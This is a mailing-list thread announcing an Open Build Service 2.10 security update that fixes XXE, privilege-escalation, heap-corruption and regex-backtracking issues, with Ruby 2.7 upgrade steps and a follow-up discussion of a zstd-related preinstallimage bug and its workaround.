Hey People,
this release is fixing 4 security problems with 2.10 and you should update your installations as fast as possible.
## Fixed Issues
1. Fix XML external entity (XXE) injection with xmlhash gem (CVE-2022-21949)
One of the Ruby gems we are using to parse XML was susceptible to this kind of attack.
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Pr...
This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
2. Fix a privilege escalation issue in ProjectDoProjectReleaseJob.
https://github.com/openSUSE/open-build-service/pull/12407
This has only minor impact as an attacker would have to time job scheduling, which is next to impossible.
3. Fix heap memory corruption in the yajl-ruby gem
For details see https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-m...
4. Fix excessive backtracking in the nokogiri gem
For details see https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5...
## Ruby 2.7
We have changed the ruby interpreter which requires a manual step when updating from a previous OBS version via packages:
1) Change Passenger to use ruby2.7
edit /etc/apache2/conf.d/mod_passenger.conf:
PassengerRuby "/usr/bin/ruby.ruby2.7"
2) Setup the rake alternative if you have multiple rake versions installed
update-alternatives --set rake /usr/bin/rake.ruby.ruby2.7
3) Restart apache2 service
systemctl restart apache2
## How to Update
Package updates are available from the 2.10 repositories
https://build.opensuse.org/project/show/OBS:Server:2.10
Fixed appliances can be downloaded from
http://openbuildservice.org/download
Henne
Hi Henne,
After updated to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
Regards, Kai
On 2022/04/20 Wed 14:12, Henne Vogelsang wrote:
Hey People,
this release is fixing 4 security problems with 2.10 and you should update your installations as fast as possible.
## Fixed Issues
- Fix XML external entity (XXE) injection with xmlhash gem (CVE-2022-21949)
One of the Ruby gems we are using to parse XML was susceptible to this kind of attack.
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Pr...
This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
- Fix a privilege escalation issue in ProjectDoProjectReleaseJob.
https://github.com/openSUSE/open-build-service/pull/12407
This has only minor impact as an attacker would have to time job scheduling, which is next to impossible.
- Fix heap memory corruption in the yajl-ruby gem
For details see https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-m...
- Fix excessive backtracking in the nokogiri gem
For details see https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5...
## Ruby 2.7
We have changed the ruby interpreter which requires a manual step when updating from a previous OBS version via packages:
Change Passenger to use ruby2.7
edit /etc/apache2/conf.d/mod_passenger.conf:
PassengerRuby "/usr/bin/ruby.ruby2.7"
Setup the rake alternative if you have multiple rake versions installed
update-alternatives --set rake /usr/bin/rake.ruby.ruby2.7
Restart apache2 service
systemctl restart apache2
## How to Update
Package updates are available from the 2.10 repositories
https://build.opensuse.org/project/show/OBS:Server:2.10
Fixed appliances can be downloaded from
http://openbuildservice.org/download
Henne
-- Henne Vogelsang http://www.opensuse.org Everybody has a plan, until they get hit.
- Mike Tyson
Hey Kai,
On 26.04.22 15:41, Kai Liu wrote:
After updated to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
There have been some commits on top of 2.10 about zstd compressed preinstall images. Other than that we have no reports about preinstallimage.
Please open an issue on github
https://openbuildservice.org/support/
Henne
On 26.04.22 15:46, Henne Vogelsang wrote:
Hey Kai,
On 26.04.22 15:41, Kai Liu wrote:
After updated to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
There have been some commits on top of 2.10 about zstd compressed preinstall images. Other than that we have no reports about preinstallimage.
RTFMailinglist.
https://lists.opensuse.org/archives/list/buildservice@lists.opensuse.org/thr...
On 2022/04/27 Wed 09:57, Stefan Seyfried wrote:
On 26.04.22 15:46, Henne Vogelsang wrote:
Hey Kai,
On 26.04.22 15:41, Kai Liu wrote:
After updated to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
There have been some commits on top of 2.10 about zstd compressed preinstall images. Other than that we have no reports about preinstallimage.
RTFMailinglist.
https://lists.opensuse.org/archives/list/buildservice@lists.opensuse.org/thr...
Thanks... didn't link that with the issue I had...
Regards, Kai
https://github.com/openSUSE/open-build-service/commit/cb954ad61a97757fb6c56a...
On 26.04.22 15:41, Kai Liu wrote:
Hi Henne,
After updated to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
https://lists.opensuse.org/archives/list/buildservice@lists.opensuse.org/thr...
Known.
Workaround on all worker hosts:
rpm -e --nodeps zstd zypper al zstd
IF the workers are running Tumbleweed, then check the "dracut -f" output that it says something like
dracut: dracut: cannot execute compression command 'zstd -3 -T0 -q', falling back to default dracut: dracut: using auto-determined compression method 'pigz'
to make sure that the initramfs is still generated.
Then trigger a rebuild of all your preinstallimages.
buildservice@lists.opensuse.org
-
Andreas Schwab -
Henne Vogelsang -
Kai Liu -
Stefan Seyfried